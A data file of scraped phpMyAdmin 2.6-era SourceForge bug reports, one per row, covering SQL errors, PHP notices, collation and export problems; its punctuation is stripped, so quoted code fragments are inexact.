Reference ID REFID) 1 FULLTEXT indexes reported as type INDEX instead of FULLTEXT on MySQL gt;=4.0.2 2 Header file not included thus stylesheet not included either) when displaying print view of multiple tables 3 In table information Attributes and Extra for columns are not displayed code for this already exists in file but is commented out???)
4 In row statistics class= print is missing in TD containing the heading Row Statistics causing slight but noticable) misalignment in Mozilla based browsers 5 Indexes, Space Usage and Row Statistics are displayed in two rows instead of one Attached is the file tbl printview.php with all of this fixed and every modification to the file is clearly marked with comment in the form so it s noticable by just scrolling throught the file) REFID from list above Short description what was done Actual line s) of code that were added altered deleted Some of this are probably not acttualy bugs but intentional things like REFID 3 and 5) but still I decided to report them...
Original URL https sourceforge.net p phpmyadmin bugs 1647 https sourceforge.net p phpmyadmin bugs 1647 Original author interghost Found in version 2.6.2","bug"
"24444","8014","Database fields beginning with str are not safed.
Database fields with names starting with str are not safed.
The problem is a hotfix 2005 02 22, rabus) in file libraries grab globals.lib.php, line 36 version 2.6.1) or 33 version 2.6.2).
In this line all variables starting with str are ignored.
The problem is the german word strasse road) witch is sometimes used as name for database fields.
I have checked the sources and saw that every configuration variable starting with str has an upper case letter as next letter.
So it ist possible to change the line 36 33 from || substr key, 0, 3) == str to || substr key, 0, 3) == str key\{3\} lt; a key\{3\} gt; z ) With this change everything works perfect for me and my clients.
Original URL https sourceforge.net p phpmyadmin bugs 1648 https sourceforge.net p phpmyadmin bugs 1648 Original author wbrunner33 Found in version 2.6.1 pl2","bug"
"24444","8015","Bad PHP code creation.
Function PMA sqlAddslashes common.lib.php) adds slashes incorrectly, which causes parse errors in PHP.
There is line 397) a string = str replace \ , \ \ , a string); There should be line 397) a string = str replace \ , \\\ , a string); Regards, Michal Original URL https sourceforge.net p phpmyadmin bugs 1649 https sourceforge.net p phpmyadmin bugs 1649 Original author mszewcz Found in version 2.6.1 pl3","bug"
"24444","8016","SQL errors when ordering by count ).
This bug was reported before 988723 and supposedly fixed.
However it is still present in 2.6.2 rc1 SELECT count ) , foo FROM bar GROUP BY foo works fine, then if you click to sort on the count ) column you get the error SELECT count ) , foo FROM bar GROUP BY foo ORDER BY `count )` ASC 1054 Unknown column count ) in order clause This is caused by phpMyAdmin inserting extraneous spaces either side of the wildcard, SELECT count ) should be SELECT count ) or conversely if you must introduce extaneous spaces put them into the ORDER BY subclause as well) Original URL https sourceforge.net p phpmyadmin bugs 1650 https sourceforge.net p phpmyadmin bugs 1650 Original author boxrec Found in version 2.6.2 rc1","bug"
"24444","8017","mySQLi and privilege.
I hope I don t make a duplicate of another bug, but here it is This take effect on 2.6.2 rc1 too, and it happens in 2.6.1 pl3 at least).
Here is the bug when you use mysqli mode eg cfg[ Servers ][ i][ extension ] = mysqli ; The php MySQL extension to use mysql or mysqli )), and when you try to fetch the root privilege or any other user, that will work too) you ve got this Utilisateur root localhost SELECT foo FROM `user` WHERE CONVERT User USING latin1) = CONVERT root USING latin1) AND CONVERT Host USING latin1) = CONVERT localhost USING latin1); L utilisateur choisi n existe pas dans la table des privilxc4x8dges It just say that root has no privileges, it would say the same with another user notice that I printed out the query to test it in mysql nt) The error append in file server privileges.php root dir) near line 1155 res = PMA DBI query SELECT \ foo\ FROM `user` WHERE .
PMA convert using User ) .
= .
PMA convert using PMA sqlAddslashes username), quoted ) .
AND .
PMA convert using Host ) .
= .
PMA convert using hostname, quoted ) .
; ); if PMA DBI affected rows userlink) lt; 1) \{ echo strUserNotFound; require once .
footer.inc.php ); \} It seems that mysqli affected rows return 0 that seems logical after a SELECT statement, even if the docs http fr.php.net manual en function.mysqli affected rows.php) seems to be confused about it...) Server information php 5.0.4 win) apache 2.0.53 win) mysql 4.1.11 nt Original URL https sourceforge.net p phpmyadmin bugs 1651 https sourceforge.net p phpmyadmin bugs 1651 Original author myshforum Found in version 2.6.1 pl3","bug"
"24444","8018","Notice error in storage engines.lib.php.
I add next one Notice Notice Undefined index Comment in C \webs\phps\admin\libraries\storage engines.lib.php on line 144 `reopen` form 1176896) PHP 5.0.0, Apache 2.0.50, MySQL 4.0.20, Win XP E.R.
E ALL Original URL https sourceforge.net p phpmyadmin bugs 1652 https sourceforge.net p phpmyadmin bugs 1652 Original author jenix","bug"
"24444","8019","Error when column name contains special chars.
Error message Warning Compilation failed missing terminating ] for character class at offset 116 in home www servers www2 phpmyadmin libraries displa y tbl.lib.php on line 750 Query SELECT field1,field2,field3 SUBSTRING field2, 1, INSTR field2, [ ) 2 ) FROM db.table INNER JOIN table2 ON field1= SUBSTRING field2, 1, INSTR field2, [ ) 2 ) Original URL https sourceforge.net p phpmyadmin bugs 1653 https sourceforge.net p phpmyadmin bugs 1653 Original author ablagnys Found in version 2.6.1 rc2","bug"
"24444","8020","PHP Warning after INSERT.
this error is only when go from EXPORT tab) to INSERT, insert new row to DB, but after insert PMA goes to EXPORT and show next error Warning) Warning Invalid argument supplied for foreach ) in [...]\admin\tbl properties export.php on line 44 PMA snapshot 2005 04 11 server PHP 5.0.0, MySQL 4.0.20, WinXP; PHP 4.3.0, MySQL 4.0.19, Win2k; Original URL https sourceforge.net p phpmyadmin bugs 1654 https sourceforge.net p phpmyadmin bugs 1654 Original author jenix","bug"
"24444","8021","Cannot edit user privilege.
After clicking edit icon for certain user at Privileges page, server privileges.php?lang=en utf 8 server=1 collation connection=utf8 general ci Then this error happened The selected user was not found in the privilege table.
at server privileges.php?lang=en utf 8 server=1 collation connection=utf8 general ci username=user hostname= 25 Tested on phpMyAdmin version 2.6.1 pl3, 2.6.2 rc1 php version 5.0.4 MySQL version 4.1.11 O S Linux Fedora 3, Windows XP SP2 cfg[ Servers ][ i][ extension ] = mysqli Original URL https sourceforge.net p phpmyadmin bugs 1655 https sourceforge.net p phpmyadmin bugs 1655 Original author boonkit","bug"
"24444","8022","Label IDs mismatch for ENUM type.
Bug exists in 2.6.1 and 2.6.2 rc1.
When you try to insert into the table host for the mysql database for instance, there s a lot of ENUM types.
Clicking the N or Y text selects the wrong radio button.
Ex Clicking the 1st ENUM Y text in that host table, selects the 5th one.
Clicking the 2nd ENUM Y text selects the 8th one and so on.
gt; The html label ID is not matching the radio button ID.
Original URL https sourceforge.net p phpmyadmin bugs 1656 https sourceforge.net p phpmyadmin bugs 1656 Original author k mystik Found in version 2.6.2 rc1","bug"
"24444","8023","Login won t work with Firefox 1.0.3.
I can t login with Firefox 1.0.3.
I tried to login with IE 6.0 sp2 and it worked just fine.
Might be some compatibility problem.
When I wrote my username and password and click Login, screen reloads itself, but it is same login screen again just without password).
It doesn t matter if I write my password right or wrong it allways acts the same.
No error message on screen, no log entries found either.
Only thing what happends is that this default string is appended to URL after clicking Login index.php?lang=fi iso 8859 1 server=1 I have following software versions on my server Debian 3.1 unstable Apache 1.3.33 PHP 4.3.10 phpMyAdmin 2.6.2 rc1 Original URL https sourceforge.net p phpmyadmin bugs 1657 https sourceforge.net p phpmyadmin bugs 1657 Original author santila Found in version 2.6.2 rc1","bug"
"24444","8024","Explicitly setting collation for a field.
Some time ago I have reported the bug 1172517 about setting collation for a field, which differs from a default table collation.
Unfortunately, I got the only response, which did not solved a problem.
So I did some tracking and found, that problem was with preg match argument in function PMA generateAlterTable.
Preg mach was unable to determine is a field of text type and should be collated or not.
So I changed the line if PMA MYSQL INT VERSION gt;= 40100 !empty collation) collation != NULL preg match TINYTEXT|TEXT|MEDIUMTEXT|LONGTEXT|VARCHAR|C HAR) i , full field type)) \{ to if PMA MYSQL INT VERSION gt;= 40100 !empty collation) collation != NULL preg match TINYTEXT|TEXT|MEDIUMTEXT|LONGTEXT|VARCHAR| CHAR) , full field type)) \{ and everything worked ok.
So Could you check please, if my changes are ok, or am I wrong?
Thank you.
I use PHP 5.0.3, MySql 4.10.11 Original URL https sourceforge.net p phpmyadmin bugs 1658 https sourceforge.net p phpmyadmin bugs 1658 Original author doguedebordeaux Found in version Latest Git snapshot","bug"
"24444","8025","Select sometimes returns nothing.
I have the following query which works with phpMyAdmin 2.5.5 pl1 and the mysql command line tool SELECT s. FROM Storage s, StorageServer enum ss, StorageVolume enum sv, StorageQtree enum sq where s.StorageServer enum id = ss.id and s.StorageVolume enum id = sv.id and s.StorageQtree enum id = sq.id and ss.Name = server01 and sv.Type = vol fs02 and sq.Name = p05 The same query issued with pma 2.6. returns nothing and that means it also doesn t return the SQL query again to edit it.
Just the same empty formular as there was before i entered the query.
It has nothing to do with other components like PHP version or mysql version because the older version of pma resides on the same physical server just on a different virtual node.
Original URL https sourceforge.net p phpmyadmin bugs 1659 https sourceforge.net p phpmyadmin bugs 1659 Original author nologin Found in version 2.6.2","bug"
"24444","8026","1030 Got error 139 from storage engine.
Dear Sir Madam I do hope this is a bug, I would hate to waste anyone s time.
I have had to recently upgrade to version 4.1.11 of MySQL, I was previously using 4.0.xx with no problems at all.
The reason for this is my ISP updated the server to 4.1.11 from 3.23.xx and I had to follow suit locally.
I am running on a Apple Mac G4 dual processor with MacOS X 10.3.9 installed.
I have MySQL 4.1.11 installed with a client API of 3.23.49.
Our ISP is running MySQL 4.1.11 with client API 4.1.11.
My local PHP is version 4.3.10 see http www.entropy.ch).
I have a DB created called sworld and inside this 40 tables.
One of the tables is called cars .
I use InnoDB tables.
The problem is as follows 1\.
If I now export the table cars from our ISP s server and then try and import locally it will produce the error mentioned in the Summary .
2\.
If I try and duplicate the table including structure and data at the ISP it will produce the error mentioned in the Summary .
This I believe proves the difference in my MySQL Client API version is not the problem.
Before updating to version 4.1.11 I never had this problem.
I can provide a dump if required with both empty fields which works) and one with the data that causes a problem.
I have examined the data and it appears there isn t one field that is causing a problem.
The problem seems to be size related.
I can get to a point where the query to the DB will work.
I add one character and it then fails.
If you need any further information please let me know.
I have tried many things and believe this to be a problem not of my making, but I guess you never know ) Original URL https sourceforge.net p phpmyadmin bugs 1660 https sourceforge.net p phpmyadmin bugs 1660 Original author ablee1","bug"
"24444","8027","Missing Character Sets and Collations.
This report is related to the deleted report 1178371 There you can read | Since phpMyAdmin 2.6.2, unavailable collations are not | offered to the user anymore.
That s not true.
Our Servers are compiled with | with charset=latin1 \ | with collation=latin1 general ci \ or configured in my.cnf | character set server = latin1 | collation server = latin1 general ci all works correct.
Instead the new phpMyAdmin.
With this, i can t use this collation.
Why?
gt; it s a different between unavailable and not compiled in .
latin1 general ci for example is not compiled in, but it s avaible and i can use it, because the server client lib knows the path to the language file latin1.xml .
Is there any solution?
Original URL https sourceforge.net p phpmyadmin bugs 1661 https sourceforge.net p phpmyadmin bugs 1661 Original author c wiedmann Found in version 2.6.2","bug"
"24444","8028","a table with a lot of fields.
Hello, I have testing the PHPmyadmin in version 2.6.2 at http www.phpmyadmin.net phpMyAdmin Thus, i create a table with the name bigtest with 300 fields So I add a line in the table http www.phpmyadmin.net phpMyAdmin sql.php?lang=fr iso 8859 1 server=1 db=phpmyadmin table=bigtest goto=tbl properties structure.php back=tbl properties structure.php sql query=SELECT 2A FROM 60bigtest 60 pos=0 The icons to modif or to delete are replace by ?
and they function not, even if i test to check the box and select the icons in bottom, they function not.
Original URL https sourceforge.net p phpmyadmin bugs 1662 https sourceforge.net p phpmyadmin bugs 1662 Original author raynox Found in version 2.6.2","bug"
"24444","8029","setPointer script error.
tbl properties structure.php submit 2 query at once update table set field=1 where 0=1; update table set field=1 where 0=1; result in readdump.php lt;tr onmouseover= setPointer this, 1, over , E5E5E5 , CCFFCC , FFCC99 ); undefined setPointer Original URL https sourceforge.net p phpmyadmin bugs 1663 https sourceforge.net p phpmyadmin bugs 1663 Original author xuefer Found in version Latest Git","bug"
"24444","8030","Theme Changes don t work.
Trying to change themes through the drop down on the PMA homepage fails and the original theme is kept as the default.
As a side note, the XP Green theme would be more correctly referred to as XP Olive since it is similar to the Windows XP theme of the same name.
Thanks for great theming!
Original URL https sourceforge.net p phpmyadmin bugs 1664 https sourceforge.net p phpmyadmin bugs 1664 Original author dpronych Found in version 2.6.2","bug"
"24444","8031","wrong detection of NULL with mysql 5.0.x.
using mysql 5.0.x, all columns are shown as NULL.
this bug is caused, i think, by the fact that mysql changed the output of describe TABLE from 4.x to 5.x.
in 4.x describe showed an empty cell for NOT NULL columns, mysql 5.x has NO in these columns.
this is a critical bug, because it almost makes it impossible to use phpmyadmin with mysql 5.x without corrupting the whole datase.
as edit always selects NULL although the column in fact is NOT NULL!)
Original URL https sourceforge.net p phpmyadmin bugs 1665 https sourceforge.net p phpmyadmin bugs 1665 Original author gucki1308 Found in version 2.6.2","bug"
"24444","8032","Bookmarks copied too many times when copying db.
I have a database foo with 50 tables and 9 saved SQL bookmarks.
That is, SELECT COUNT ) FROM pma bookmark WHERE dbase= foo ; returns 9.
If I use the Operations tab to make a copy of this database and call it bar, then there are too many bookmarks for the new database SELECT COUNT ) FROM pma bookmark WHERE dbase= bar ; returns 450.
Each of the 9 bookmarks is in there 50 times, once for each table.
I observe this on both of our servers PMA 2.6.2, MySQL 4.1.11, PHP 5.0.4, Apache 1.3.33, Mac OS X 10.3.9.
PMA 2.6.1 pl3, MySQL 4.1.8, PHP 4.3.9, Apache 2.0.52, Gentoo Linux.
Original URL https sourceforge.net p phpmyadmin bugs 1666 https sourceforge.net p phpmyadmin bugs 1666 Original author ryandesign Found in version 2.6.2","bug"
"24444","8033","Undefined index htmlexcel null.
log into PMA select the phpmyadmin database click the Export tab Notice Undefined index htmlexcel null in phpMyAdmin 2.6.2 libraries display export.lib.php on line 529 called from require once phpMyAdmin 2.6.2 libraries display export.lib.php ) in Library WebServer pma phpMyAdmin 2.6.2 db details export.php on line 58 Original URL https sourceforge.net p phpmyadmin bugs 1667 https sourceforge.net p phpmyadmin bugs 1667 Original author ryandesign Found in version 2.6.2","bug"
"24444","8034","Missing < ul> in server status.php.
The lt;ul gt; that s opened in server status.php is never closed.
Original URL https sourceforge.net p phpmyadmin bugs 1668 https sourceforge.net p phpmyadmin bugs 1668 Original author ryandesign Found in version 2.6.2","bug"
"24444","8035","JS error on creating table.
When I creating new table and changing field type, browser gets javascript error display field options is not defined .
Anyways table created well.
PHP 5.0.3 MySQL 4.0.18 Browser Firefox 1.0 OS Linux Original URL https sourceforge.net p phpmyadmin bugs 1669 https sourceforge.net p phpmyadmin bugs 1669 Original author nullevent Found in version Latest Git","bug"
"24444","8036","zero rows not URL encoded.
There s a place in db details structure.php where a GET parameter is not properly URL encoded.
The patch fixes it.
Original URL https sourceforge.net p phpmyadmin bugs 1670 https sourceforge.net p phpmyadmin bugs 1670 Original author ryandesign Found in version 2.6.2","bug"
"24444","8037","8 spaces at end of export textarea.
select a table click the Export tab click Go do not save as file, do not compress) Now scroll to the bottom of the textarea.
There are 8 spaces at the end which should not be there.
The attached patch removes them.
Original URL https sourceforge.net p phpmyadmin bugs 1671 https sourceforge.net p phpmyadmin bugs 1671 Original author ryandesign Found in version 2.6.2","bug"
"24444","8038","XHTML compliance <img >, <input >, <form>.
Found some XHTML compliance issues some lt;img gt; tags were not self closed some lt;input gt; tags were not self closed one lt;form gt; tag was written in UPPERCASE The patch fixes it.
Original URL https sourceforge.net p phpmyadmin bugs 1672 https sourceforge.net p phpmyadmin bugs 1672 Original author ryandesign Found in version 2.6.2","bug"
"24444","8039","CSS miss Hevetica).
Hard to put in a category... printing, typos?
Probably not very version specific.
themes darkblue orange css theme print.css.php and themes original css theme print.css.php both uses the font Hevetica should be Helvetica Original URL https sourceforge.net p phpmyadmin bugs 1673 https sourceforge.net p phpmyadmin bugs 1673 Original author castorius Found in version 2.6.1 pl3","bug"
"24444","8040","Exporting without enclosing with backquotes.
On exporting entire database structure only ie no data) in sql format from export.php using just the export options add IF NOT EXISTS add into comments gt; relations The following error is created immediately after the database comments, and after each tables relationships lt;b gt;Notice lt; b gt; Undefined variable current identifier in lt;b gt; var www html phpMyAdmin 2.6.2 pl1 libraries sqlparser.lib.php lt; b gt; on line lt;b gt;1631 lt; b gt; lt;br gt; This happens in many blocks ie following the database comments it is repeated seven times on my export and anywhere between 2 and 20 times following the relationships in the comments.
It can be duplicated in different databases but only occurs on those with phpmyadmin relationships ie those specified in relation view and llocated in the pma relations table) PHP 4.3.8 mySQL 4.0.20 phpmyadmin 2.6.2 pl1 apache 2.0.50 os mandrake 10.1 browser Mozilla 5.0 X11; U; Linux i686; en US; rv 1.7.5) Gecko 20041107 Firefox 1.0 datetime 200505092165 NZST Original URL https sourceforge.net p phpmyadmin bugs 1674 https sourceforge.net p phpmyadmin bugs 1674 Original author timgrin Found in version 2.6.2 pl1","bug"
"24444","8041","Strange field attributes.
Hi, I have php 5.0.4 and MySQL 5.0.4 Beta I noticed that all the fields in my DBs has random attribute like NULL or NOT NULL, DEFAULT VALUE, AUTO INCREMENT and so on.
for example CREATE TABLE `core comuni zipcode` `id comune` bigint 20) NOT NULL default 0 , `id zipcode` bigint 20) NOT NULL default 0 , KEY `id comune` `id comune`), KEY `id zipcode` `id zipcode`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT= zipcode dei vari comuni ; u can see that both fields are NOT NULL and default 0. when i browse the field of the table i see this Field Type Collation Attributes Null Default id comune bigint 20) Yes 0 id zipcode bigint 20) Yes 0 now u can see that the fields are NULL able.
So, this is strange couse if i try to insert a tuple it give me the right form with no possibility to insert NULL value.
I noticed this error since MySQL 5.0.3 regards Lorenzo Original URL https sourceforge.net p phpmyadmin bugs 1675 https sourceforge.net p phpmyadmin bugs 1675 Original author strozzino Found in version 2.6.2","bug"
"24444","8042","Export data only includes auto increment.
If I export the data only the data) of a table, in the result appears also the auto increment at the end of the sql query.
Example CREATE TABLE `table` `id` int 4) NOT NULL auto increment, `name` varchar 255) NOT NULL default , PRIMARY KEY `id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 AUTO INCREMENT=7 ; I think add an option to remove this problem is a good idea Original URL https sourceforge.net p phpmyadmin bugs 1676 https sourceforge.net p phpmyadmin bugs 1676 Original author alesegala Found in version 2.6.2","bug"
"24444","8043","blowfish secret corrupted pma username.
Sorry if I m an idiot, I m a lousy programmer, but something with the combination of Firefox, phpMyAdmin, and cfg[ blowfish secret ] is wacky.
Client Firefox 1.0.4 on FC3 Server php 4.3.10 phpMyAdmin 2.6.2pl1 libmcrypt 2.5.7 6 rpm) If blowfish secret in config.inc.php is set to something not liked ??
), a random string of characters appear in the pma username field, ie xc5x95 xc5xb9xc2x8exx0f 5 .
This is preventing me from logging into phpMyAdmin.
Any combination of username passwd kicks me back to the login screen and pma username is populated with the same wacky string.
Attempted resolutions Unsuccessful Change blowfish secret A different string appears for a different blowfish secret.
If, for example, I use foo , pma username is empty, but logins still blocked.
Other blowfish secrets give other random strings.
Delete any possibly related saved passwords from FF No change pma username populated with string as above) Delete cookies.txt in FF profile No change Successful relatively speaking) Delete the FF profile Problem seems to go away temporarily?)
Use Mozilla Problem does not appear to be present Change PmaAbsoluteUri from https to http Problem seems to go away This could truly be an FF problem, please let me know if it is more likely, and I will post a bug report there ?).
Thanks.
Original URL https sourceforge.net p phpmyadmin bugs 1677 https sourceforge.net p phpmyadmin bugs 1677 Original author rjhornsby Found in version 2.6.2 pl1","bug"
"24444","8044","Long query string gets truncated when printing.
When attempting to print the result set of a long query, phpmyadmin opens the new window but returns the MySQL syntax error message.
The error message indicates that the query is being truncated before executing which results in the syntax error message.
Attached is the query in question.
It executes fine, but fails when attempting to print.
Using phpmyadmin 2.6.2 pl1 and MySQL 4.1.11 on Windows XP, IE 6.0 Original URL https sourceforge.net p phpmyadmin bugs 1678 https sourceforge.net p phpmyadmin bugs 1678 Original author alexf153 Found in version 2.6.2 pl1","bug"
"24444","8045","error with special character ERROR C1 C2 LEN 4 5 11).
SQL Str use xc2xb4mysqlxc2xb4 Because of the xc2xb4 = asc 180) ) an error msq appears!
phpMyAdmin Output ERROR C1 C2 LEN 4 5 11 STR xc2xb4 CVS Id sqlparser.lib.php,v 2.23 2004 08 09 01 22 59 lem9 Exp MySQL 4.0.17 nt USR OS, AGENT, VER Win IE 6.0 PMA 2.6.0 pl2 PHP VER,OS 4.3.3 WINNT LANG de iso 8859 1 SQL use xc2xb4mysqlxc2xb4 The console mysqy.exe) has no problem running this.
Because there is an table called xc2xb4mysqlxc2xb4 the char 180) are a part of this db name!
Info I don t post the BEGIN CUT cause i do not know what s in this base64 hash why does this did not appears as a plan text?
regards Thomas Original URL https sourceforge.net p phpmyadmin bugs 1679 https sourceforge.net p phpmyadmin bugs 1679 Original author hmilchuser Found in version 2.6.0 pl2","bug"
"24444","8046","Searching on a VARBINARY field.
MySQL Version 4.1.11 Connection collation binary Row collation binary Searching for country DE from the Seach window create the query; SELECT FROM `address` WHERE `country code` = DE LIMIT 0 , 30 The quotes are missing in the WHERE clause and fails with error; 1054 Unknown column DE in where clause Original URL https sourceforge.net p phpmyadmin bugs 1680 https sourceforge.net p phpmyadmin bugs 1680 Original author ontwikkel Found in version 2.6.2","bug"
"24444","8047","Rename table not updated.
After you rename a table name manualy alter table TABLE OLD rename to TABLE NEW There is no update in the left db navigation Then left navigation to that table is useless if it trys to link to that table Original URL https sourceforge.net p phpmyadmin bugs 1681 https sourceforge.net p phpmyadmin bugs 1681 Original author visje nl Found in version 2.6.0 pl3","bug"
"24444","8048","Left frame browse icon alt tag emptying table).
When I empty a table the alt tag for the table name in the left frame correctly shows 0 rows) but the browse icon, on rollover, incorrectly displays Browse x rows) where x was the number of rows before it was emptied.
Windows XP SP2 Apache 2.0.54 mysql 4.1.12 PHP 4.3.11 phpmyadmin 2.6.2pl1 Original URL https sourceforge.net p phpmyadmin bugs 1682 https sourceforge.net p phpmyadmin bugs 1682 Original author qpchan Found in version 2.6.2 pl1","bug"
"24444","8049","Timestamp Field Issue.
1\.
Create a new table with 1 field and name the field Test.
2\.
Select TIMESTAMP for field type and check CURRENT TIMESTAMP in default value 3\.
Change the field type to INT.
4\.
Hit SAVE You will notice that PHPMyAdmin is trying to perform the following CREATE TABLE `test` `test` INT DEFAULT CURRENT TIMESTAMP NOT NULL ) TYPE = MYISAM There should be a javascript script that unchecks the CURRENT TIMESTAMP checkbox when the field type is not TIMESTAMP or have it process that server side so that it is not possible.
Original URL https sourceforge.net p phpmyadmin bugs 1683 https sourceforge.net p phpmyadmin bugs 1683 Original author ezscripts Found in version 2.6.2 pl1","bug"
"24444","8050","Can t change table type MySQL 5.0.4).
1\.
Create a table of the type MyISAM 2\.
go to Operations and change the table type to e.g.
MEMORY result Your SQL query has been executed successfully SQL query ALTER TABLE `table` TYPE = MYISAM The table type is always changed to the current one e.g you hava table with type MEMORY it is changed to MEMORY I m using MySQL 5.0.4 beta standard log phpMyAdmin 2.6.2 pl1 and php 5.0.4 on a apache httpd 2.1.3 Original URL https sourceforge.net p phpmyadmin bugs 1684 https sourceforge.net p phpmyadmin bugs 1684 Original author linusl Found in version 2.6.2 pl1","bug"
"24444","8051","Undefined theme generation theme version.
Notice Undefined variable theme generation in libraries common.lib.php on line 367 Notice Undefined variable theme version in libraries common.lib.php on line 370 Patch attached.
Original URL https sourceforge.net p phpmyadmin bugs 1685 https sourceforge.net p phpmyadmin bugs 1685 Original author ryandesign Found in version Latest Git","bug"
"24444","8052","Wrong messages on checking number values.
If you try to create a table with lt; 1 fields, the error message displayed reads 0 is not a valid row number!
It should read 0 is not a valid number of fields!
or maybe better something like A table must have at least 1 field.
Original URL https sourceforge.net p phpmyadmin bugs 1686 https sourceforge.net p phpmyadmin bugs 1686 Original author ryandesign Found in version Latest Git","bug"
"24444","8053","Undefined index Field Undefined variable analyzed sql.
Begin creating a table with 1 field.
The following notices are displayed Notice Undefined index Field in tbl properties.inc.php on line 348 Notice Undefined variable analyzed sql in tbl properties.inc.php on line 348 Original URL https sourceforge.net p phpmyadmin bugs 1687 https sourceforge.net p phpmyadmin bugs 1687 Original author ryandesign Found in version Latest Git","bug"
"24444","8054","Invalid SQL when creating table with 0 fields.
Begin creating a new table.
Specify a name and set the number of fields to 1.
Submit the form without filling in information for the field.
PMA tries to execute this SQL CREATE TABLE `foo` ) TYPE = innodb And MySQL complains that this is not valid 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ) TYPE = innodb at line 1 PMA should detect this and prevent the user from proceeding to the next page until at least one field is filled out.
Original URL https sourceforge.net p phpmyadmin bugs 1688 https sourceforge.net p phpmyadmin bugs 1688 Original author ryandesign Found in version Latest Git","bug"
"24444","8055","Undefined index from PMA setComment ).
Begin creating a new table with 2 fields.
Fill in the first field as a varchar 255 and give it a name.
Do not fill in the second field.
Click the Save button.
A table with 1 field is created, as desired, but also these notices are displayed Notice Undefined index in libraries relation.lib.php on line 607 called from PMA setComment 8, Undefined index , libraries relation.lib.php , 607, lt;array gt;) in tbl create.php on line 203 Notice Undefined index in libraries relation.lib.php on line 614 called from PMA setComment ) in tbl create.php on line 203 Notice Undefined index in libraries relation.lib.php on line 614 called from PMA setComment ) in tbl create.php on line 203 Notice Undefined index in libraries relation.lib.php on line 614 called from PMA setComment ) in tbl create.php on line 203 Notice Undefined index in libraries relation.lib.php on line 614 called from PMA setComment ) in tbl create.php on line 203 Notice Undefined index in libraries relation.lib.php on line 614 called from PMA setComment ) in tbl create.php on line 203 Original URL https sourceforge.net p phpmyadmin bugs 1689 https sourceforge.net p phpmyadmin bugs 1689 Original author ryandesign Found in version Latest Git","bug"
"24444","8056","SQL Export forgets 0 in enum fields.
When I use the export function with an field enum 0 , 1 ) the corresponding exported sql query misses the 0.
Instead it writes for each record that has the value 0!
e.g.
name varchar 30) gender enum 0 , 1 ); Tim 0 Maria 1 phpMyAdmin Export produces INSERT INTO foo VALUES Tim , ); 0 missing!
INSERT INTO foo VALUES Maria , 1 ); Original URL https sourceforge.net p phpmyadmin bugs 1690 https sourceforge.net p phpmyadmin bugs 1690 Original author flatpredator Found in version 2.6.1 rc1","bug"
"24444","8057","Export problem Using ANSI.
PhpMyAdmin version 2.6.2 pl1 MySql version 4.1.11 nt Apache Version 2.0.53 OS Windows XP I have just tried to export a table in spanish) setting the SQL export compatibility to ANSI and got back two different errors wich I m documenting here.
First the response from the operation can not be used unless you edit the result) back because of a lot of NOTICE messages embebed within the query result.
I have enclosed a file ControlDeFechas.sql with the result of the query.
In the same query the export table result has some extrange characters instead of the accented characters that are really displayed in a browser.
These characters will result in a wrong database content if you upload the result of the query back to Mysql.
In the enclosed file ControlDeFechas.sql you will find examples of the characters in question.
I m a spanish speaking user and I need to be able to download my tables as a means of comunicating with different users and due to these characters wich didn t appear in earlier versions of PhpMyAdmin and MySql I have not been able to install the latest versions of both software in the sites I mantain.
Also I have included an Image ErrorPhpMyAdmin.png with the EXPORT settings under PhpMyAdmin as a guide of the steps I do.
Carlos.
Original URL https sourceforge.net p phpmyadmin bugs 1691 https sourceforge.net p phpmyadmin bugs 1691 Original author yacar suscri Found in version 2.6.2 pl1","bug"
"24444","8058","database list.
i have 2 dbs.
then i deleted one but in the navigation there is still the select box with the 2 dbs gt; view attachment system firefox 1.0.4 php 5.0.4 MySQL 4.1.12 pma 2.6.2 pl1 Original URL https sourceforge.net p phpmyadmin bugs 1692 https sourceforge.net p phpmyadmin bugs 1692 Original author darkcoder23 Found in version 2.6.2 pl1","bug"
"24444","8059","Db copy feature always perform CREATE DATABASE.
Database copy feature database gt;operations gt; Copy database to) always perform CREATE DATABASE before it attempt to copy which is not fully correct behaviour.
Some ISP gives you pre created databases.
Some gives you no permission for CREATE to avoid mess in database schemes and forces you to use their admin panel for that.
Conclusion is we need Do not CREATE DATABASE checkbox Original URL https sourceforge.net p phpmyadmin bugs 1693 https sourceforge.net p phpmyadmin bugs 1693 Original author carl os Found in version 2.6.2 rc1","bug"
"24444","8060","FAQ Entry 2.8 Missing parameters).
The FAQ entry 2.8 I get Missing parameters errors, what can I do?)
suggests two fixes.
But there is another source for this problem Hardened PHP with the ini directive varfilter.max request variables set to the default 200) or another low value can also lead to this problem for tables with a high number of columns.
I fixed it by setting varfilter.max request variables to 1000.
It may be usefull to add this hint to the FAQ.
Original URL https sourceforge.net p phpmyadmin bugs 1694 https sourceforge.net p phpmyadmin bugs 1694 Original author kdorn Found in version 2.6.2 pl1","bug"
"24444","8061","Copying database default charset collation lost).
If I have a database and copy it using PMA s Operations panel, then the copy uses by default the server s default character set like latin1), even if the original database had specified a different default.
To reproduce create a database test collation with the latin2 general ci charset.
The following SQL is produced CREATE DATABASE `test collation` DEFAULT CHARACTER SET latin2 COLLATE latin2 general ci; Now use the Operations tab to copy the database to one called test collation copy .
The following SQL is produced CREATE DATABASE `test collation copy` ; Because no charset or collation is specified, the server s default is used.
The original database s charset and collation should be carried over to the copy.
Original URL https sourceforge.net p phpmyadmin bugs 1695 https sourceforge.net p phpmyadmin bugs 1695 Original author ryandesign Found in version Latest Git","bug"
"24444","8062","typo in config comments.
Spotted a VERY small typo on line 312 in config.inc.php.
This line is the one that sets the default export format cfg[ Export ][ format ] In the comments for that config option, there is a list of options one can use.
One of those options states hmtlexcel And it should really be htmlexcel vjl Original URL https sourceforge.net p phpmyadmin bugs 1696 https sourceforge.net p phpmyadmin bugs 1696 Original author vjl Found in version 2.6.2 pl1","bug"
"24444","8063","Missing Old Password.
In tbl change.php, in the Function dropdown, the OLD PASSWORD function does not appear in the dropdown list.
It should be added to the cfg[ Functions ] array line 672) in config.inc.php to allow for backwards compatiblility with pre Mysql 4.1 installations that are not designed to use the longer string generated by the PASSWORD function.
See, A.2.3.
Client does not support authentication protocol in the MySQL documentation.
Original URL https sourceforge.net p phpmyadmin bugs 1697 https sourceforge.net p phpmyadmin bugs 1697 Original author cdvrooman Found in version 2.6.2 pl1","bug"
"24444","8064","error with for disp.
dupl.
rows for index.
